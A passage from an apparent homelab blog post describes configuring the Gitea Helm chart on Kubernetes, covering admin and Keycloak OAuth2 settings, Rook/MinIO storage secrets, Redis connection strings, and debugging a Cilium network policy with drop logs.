</span></span><span style="display:flex;"><span>      <span style="color:#f92672">UPDATE_EXISTING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.deleted_branches_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">migrations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOW_LOCALNETWORKS</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__USER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__DATABASE__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__SECURITY__SECRET_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__OAUTH2__JWT_SECRET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jwt-secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">jwt</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__MAILER__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_BUCKET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the <code>gitea.admin</code> config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#66d9ef">null</span>
</span></span></code></pre></div><p>I&rsquo;ve already got an admin account, so I didn&rsquo;t want the Helm chart to create a
new one. I thought I could do that by just setting <code>admin: {}</code>, but that of course
doesn&rsquo;t work. So the Helm chart created an admin user with the chart&rsquo;s default
<code>gitea.admin.password</code>. But I then figured out that setting all values to <code>null</code>
does work. It&rsquo;s important to note that Gitea doesn&rsquo;t then remove the newly
created admin user again. It needs to be deleted manually via the UI.</p>
<p>The <code>gitea.oauth</code> config is also worth a paragraph. First, it&rsquo;s important to note
that this is the config for Gitea as an Oauth2 <em>client</em>. The config for Gitea
as an identity provider has to be done in another place.
I&rsquo;m using <a href="https://www.keycloak.org/">Keycloak</a> as my identity provider in the
Homelab. For more details, see <a href="https://blog.mei-home.net/posts/sso/">this post</a>.
The issue is that Gitea&rsquo;s OAuth2 client config can only be done in the UI or
via the CLI, not via the config file. And I had already taken my Nomad instance
down at this point. I could get the client ID and secret from Keycloak, but not
the name under which it was saved in the database for example. It was also
pretty unclear what options should be set under the <code>gitea.oauth</code> key. I finally
ended up looking into the <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/templates/gitea/init.yaml">init container script</a>,
which is a bash script using the Gitea CLI to create the OAuth2 entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>    <span style="color:#66d9ef">function</span> configure_oauth<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- <span style="color:#66d9ef">if</span> .Values.gitea.oauth <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- range $idx, $value :<span style="color:#f92672">=</span> .Values.gitea.oauth <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      local OAUTH_NAME<span style="color:#f92672">={{</span> <span style="color:#f92672">(</span>printf <span style="color:#e6db74">&#34;%s&#34;</span> $value.name<span style="color:#f92672">)</span> | squote <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      local full_auth_list<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>gitea admin auth list --vertical-bars<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>      local actual_auth_table<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># We might have distorted output due to warning logs, so we have to detect the actual user table by its headline and trim output above that line</span>
</span></span><span style="display:flex;"><span>      local regex<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;(.*)(ID\s+\|Name\s+\|Type\s+\|Enabled.*)&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>full_auth_list<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span>~ $regex <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>        actual_auth_table<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>BASH_REMATCH[2]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tail -n+2<span style="color:#66d9ef">)</span> <span style="color:#75715e"># tail&#39;ing to drop the table headline</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      local AUTH_ID<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>actual_auth_table<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | grep -E <span style="color:#e6db74">&#34;\|</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">\s+\|&#34;</span> | grep -iE <span style="color:#e6db74">&#39;\|OAuth2\s+\|&#39;</span> | awk -F <span style="color:#e6db74">&#34; &#34;</span>  <span style="color:#e6db74">&#34;{print \$1}&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;No oauth configuration found with name &#39;</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;. Installing it now...&#34;</span>
</span></span><span style="display:flex;"><span>        gitea admin auth add-oauth <span style="color:#f92672">{{</span>- include <span style="color:#e6db74">&#34;gitea.oauth_settings&#34;</span> <span style="color:#f92672">(</span>list $idx $value<span style="color:#f92672">)</span> | indent <span style="color:#ae81ff">1</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;...installed.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#34;Existing oauth configuration with name &#39;</span><span style="color:#e6db74">${</span>OAUTH_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;: &#39;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;. Running update to sync settings...&#34;</span>
</span></span><span style="display:flex;"><span>        gitea admin auth update-oauth --id <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>AUTH_ID<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">{{</span>- include <span style="color:#e6db74">&#34;gitea.oauth_settings&#34;</span> <span style="color:#f92672">(</span>list $idx $value<span style="color:#f92672">)</span> | indent <span style="color:#ae81ff">1</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;...sync settings done.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- end <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- <span style="color:#66d9ef">else</span> <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>        echo <span style="color:#e6db74">&#39;no oauth configuration... skipping.&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">{{</span>- end <span style="color:#f92672">}}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    configure_oauth
</span></span></code></pre></div><p>I&rsquo;ve removed some unimportant bits for the sake of brevity (heh, brevity &#x1f602;).
What we can see here is that the entries in the <code>gitea.oauth</code> section are converted
into CLI flags and their parameters 1:1.
For finding the right options I used for my Keycloak setup, I ended up looking
into the database:</p>
<pre tabindex="0"><code>\c gitea
SELECT * FROM login_source;

id | type |   name   | is_sync_enabled |                                                                                                                                                                                               cfg                                                                                                                                                                                               | created_unix | updated_unix | is_active
----+------+----------+-----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-----------
  1 |    6 | Keycloak | f               | {&#34;Provider&#34;:&#34;openidConnect&#34;,&#34;ClientID&#34;:&#34;bar&#34;,&#34;ClientSecret&#34;:&#34;foo&#34;,&#34;OpenIDConnectAutoDiscoveryURL&#34;:&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;,&#34;CustomURLMapping&#34;:null,&#34;IconURL&#34;:&#34;&#34;,&#34;Scopes&#34;:null,&#34;RequiredClaimName&#34;:&#34;&#34;,&#34;RequiredClaimValue&#34;:&#34;&#34;,&#34;GroupClaimName&#34;:&#34;&#34;,&#34;AdminGroup&#34;:&#34;&#34;,&#34;RestrictedGroup&#34;:&#34;&#34;,&#34;SkipLocalTwoFA&#34;:true} |   1678573526 |   1678573526 | t
(1 row)
</code></pre><p>But this still left the question of how the <code>gitea.oauth.existingSecret</code> should
be formatted. Which keys was the chart expecting the Secret to have?
I wasn&rsquo;t able to find any info, so I ended up looking first for the place where
the <code>gitea.oauth_settings</code> from the init script above was defined, which lead
me to the chart&rsquo;s <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/templates/_helpers.tpl">helpers</a>
again:</p>
<pre tabindex="0"><code>{{- define &#34;gitea.oauth_settings&#34; -}}
{{- $idx := index . 0 }}
{{- $values := index . 1 }}

{{- if not (hasKey $values &#34;key&#34;) -}}
{{- $_ := set $values &#34;key&#34; (printf &#34;${GITEA_OAUTH_KEY_%d}&#34; $idx) -}}
{{- end -}}

{{- if not (hasKey $values &#34;secret&#34;) -}}
{{- $_ := set $values &#34;secret&#34; (printf &#34;${GITEA_OAUTH_SECRET_%d}&#34; $idx) -}}
{{- end -}}

{{- range $key, $val := $values -}}
{{- if ne $key &#34;existingSecret&#34; -}}
{{- printf &#34;--%s %s &#34; ($key | kebabcase) ($val | quote) -}}
{{- end -}}
{{- end -}}
{{- end -}}
</code></pre><p>Here, the <code>key</code> and <code>secret</code> values, if not defined in the chart, are set to
the <code>GITEA_OAUH_KEY_$ID</code> and <code>GITEA_OUATH_SECRET_$ID</code> env variables. Looking for those variables then lead me
to the <a href="https://gitea.com/gitea/helm-chart/src/branch/main/templates/gitea/deployment.yaml">Deployment template</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA_OAUTH_KEY_{{ $idx }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>:  <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">$value.existingSecret }}</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA_OAUTH_SECRET_{{ $idx }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>:  <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: {{ <span style="color:#ae81ff">$value.existingSecret }}</span>
</span></span></code></pre></div><p>And here I finally had my answer: The Secret should have a key <code>key</code> and a key
<code>secret</code> for the two values. Armed with that info I could finally define the
OAuth2 options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;</span>
</span></span></code></pre></div><p>One thing which annoyed me is in Gitea&rsquo;s S3 config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The <code>MINIO_ENDPOINT</code> needs to have the host and port in one value. But the
ConfigMap created by Rook for a new bucket contains them only in separate keys,
meaning I had to hardcode the value in the <code>values.yaml</code> instead of taking it
from the ConfigMap.
But at least I could still use the Secret Rook creates to get the S3 credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GITEA__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>An option like this is what more Helm charts should have: The ability to use
the <code>valueFrom</code> form of defining env variables. With this, I can easily use
autogenerated Secrets and ConfigMaps without having to jump through hoops.</p>
<p>Next stumbling block was the redis config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span></code></pre></div><p>Here I wasn&rsquo;t aware that the connection string has to have a certain format
and isn&rsquo;t just host:port. Took me a while to figure out why I wasn&rsquo;t able to make
a connection with Redis.</p>
<p>And finally, another word on YAML: Check your indentation! &#x1f605;
I had to make sure that the entire network could reach the SSH service so I
could actually use it for git operations. So I added <code>fromEntities:\n - world</code> to the
network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;gitea&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>And when I still could not connect, I checked with Cilium&rsquo;s monitoring:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-vh5jj -- cilium monitor --type drop
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
